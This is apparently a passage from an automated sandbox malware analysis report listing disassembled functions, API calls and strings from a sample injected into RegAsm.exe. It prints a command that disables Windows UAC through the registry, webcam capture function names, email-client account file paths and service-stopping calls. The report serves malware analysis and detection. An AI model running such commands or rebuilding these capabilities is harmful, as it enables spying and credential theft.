                                                          • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                                          • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                                                          • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                                          • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                                                          Function 10008821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                          • __freea.LIBCMT ref: 10008A08
                                                            • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                          • __freea.LIBCMT ref: 10008A11
                                                          • __freea.LIBCMT ref: 10008A36
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1414292761-0
                                                          • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                          • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                          • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                          • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                          Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Sleep.KERNEL32(00000000,0040D262), ref: 004044C4
                                                            • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: H_prologSleep
                                                          • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                          • API String ID: 3469354165-3054508432
                                                          • Opcode ID: d42d166ef557013daffa9f0694fdf7832456630aeab69a2e5028fc491a4160c5
                                                          • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                                                          • Opcode Fuzzy Hash: d42d166ef557013daffa9f0694fdf7832456630aeab69a2e5028fc491a4160c5
                                                          • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                                                          Function 004458F9 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __cftoe
                                                          • String ID:
                                                          • API String ID: 4189289331-0
                                                          • Opcode ID: 5e612228480a368e38a3c2cd5c9ced2759c3311217c7fd18b84c82b5e53f56ae
                                                          • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                                                          • Opcode Fuzzy Hash: 5e612228480a368e38a3c2cd5c9ced2759c3311217c7fd18b84c82b5e53f56ae
                                                          • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                                                          Function 100015DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _strlen.LIBCMT ref: 10001607
                                                          • _strcat.LIBCMT ref: 1000161D
                                                          • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                          • lstrcatW.KERNEL32(?,?), ref: 1000165A
                                                          • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                          • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: lstrcatlstrlen$_strcat_strlen
                                                          • String ID:
                                                          • API String ID: 1922816806-0
                                                          • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                          • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                          • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                          • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                          Function 10001000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrcatW.KERNEL32(?,?), ref: 10001038
                                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                          • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                          • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$AttributesFilelstrcat
                                                          • String ID:
                                                          • API String ID: 3594823470-0
                                                          • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                          • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                          • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                          • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                          Function 0041AC78 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                                                          • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                          • String ID:
                                                          • API String ID: 493672254-0
                                                          • Opcode ID: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                                                          • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                                                          • Opcode Fuzzy Hash: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                                                          • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                                                          Function 10003856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                          • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastValue___vcrt_
                                                          • String ID:
                                                          • API String ID: 3852720340-0
                                                          • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                          • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                          • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                          • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                          Function 00448215 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                          • _free.LIBCMT ref: 0044824C
                                                          • _free.LIBCMT ref: 00448274
                                                          • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                          • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                          • _abort.LIBCMT ref: 00448293
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$_free$_abort
                                                          • String ID:
                                                          • API String ID: 3160817290-0
                                                          • Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                                          • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                                                          • Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                                          • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                                                          Function 10005AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                          • _free.LIBCMT ref: 10005B2D
                                                          • _free.LIBCMT ref: 10005B55
                                                          • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                          • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                          • _abort.LIBCMT ref: 10005B74
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$_free$_abort
                                                          • String ID:
                                                          • API String ID: 3160817290-0
                                                          • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                          • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                          • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                          • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                          Function 0041AAA6 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                          • String ID:
                                                          • API String ID: 221034970-0
                                                          • Opcode ID: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                                                          • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                                                          • Opcode Fuzzy Hash: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                                                          • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                                                          Function 0041ABAA Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                                                          • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                          • String ID:
                                                          • API String ID: 221034970-0
                                                          • Opcode ID: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                                                          • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                                                          • Opcode Fuzzy Hash: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                                                          • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                                                          Function 0041AC11 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                                                          • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                          • String ID:
                                                          • API String ID: 221034970-0
                                                          • Opcode ID: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                                                          • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                                                          • Opcode Fuzzy Hash: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                                                          • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                                                          Function 100011EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                            • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                            • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                          • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                            • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                            • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                          • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                          • API String ID: 4036392271-1520055953
                                                          • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                          • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                          • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                          • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                          Function 0040A675 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                                          • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleSizeSleep
                                                          • String ID: XQG
                                                          • API String ID: 1958988193-3606453820
                                                          • Opcode ID: ed692bf81f71d99d64d0e48405d0f3cb823898ebec9c5078a7592842c921da17
                                                          • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                                                          • Opcode Fuzzy Hash: ed692bf81f71d99d64d0e48405d0f3cb823898ebec9c5078a7592842c921da17
                                                          • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                                                          Function 0041D50F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegisterClassExA.USER32(00000030), ref: 0041D55B
                                                          • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                                          • GetLastError.KERNEL32 ref: 0041D580
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ClassCreateErrorLastRegisterWindow
                                                          • String ID: 0$MsgWindowClass
                                                          • API String ID: 2877667751-2410386613
                                                          • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                                          • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                                                          • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                                          • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                                                          Function 00407755 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                                                          • CloseHandle.KERNEL32(?), ref: 004077AA
                                                          • CloseHandle.KERNEL32(?), ref: 004077AF
                                                          Strings
                                                          • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                                          • C:\Windows\System32\cmd.exe, xrefs: 00407796
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandle$CreateProcess
                                                          • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                          • API String ID: 2922976086-4183131282
                                                          • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                                          • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                                                          • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                                          • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                                                          Function 00407260 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076C4
                                                          • SG, xrefs: 004076DA
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
